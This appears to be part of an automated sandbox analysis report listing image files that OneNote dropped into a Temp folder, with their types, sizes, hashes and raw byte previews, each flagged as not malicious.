Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Temp\{8B8B4CC4-431E-4C9F-BBFB-E458D5076843}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{8BC3CD87-1C28-42B4-9CB3-144C6747D66D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{8C33D5E9-A306-429B-A897-9E304121195F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{8CEB5C05-8345-4A03-BCB9-5317D44A4509}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{8D8894CD-805F-4A42-909B-3C357BCA7FD3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{8E313225-9C4B-43C6-9F89-DAAA37D19EAF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{8FCA0D1D-A239-4B4A-A397-DAEC694F57B9}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	567
Entropy (8bit):	7.499095532051442
Encrypted:	false
SSDEEP:	12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
MD5:	D055CE625528E448C61315EAAEF5BB71
SHA1:	029DF4C872B1C154F32E7FE94F434547C3BA6192
SHA-256:	85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
SHA-512:	705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{\|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...\|...a<!..d....IEND.B`.

C:\Users\user\AppData\Local\Temp\{90BFB183-562E-41FB-B031-19EDD39C9EA4}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{925BA582-9B1D-43E3-B6D3-2B3DC9BFAAD5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{927BCC0D-522B-4A9E-B00C-5CE8E01712DD}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{92CD9EF3-8BD7-4532-B8F6-76404D4A40EF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{93F053A8-8C9D-4CC2-A107-CD932094E1C3}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{970FF6F3-B089-429F-8634-D11BA5F590D8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{97FE5FB5-FE44-450A-910C-576F988B90B8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
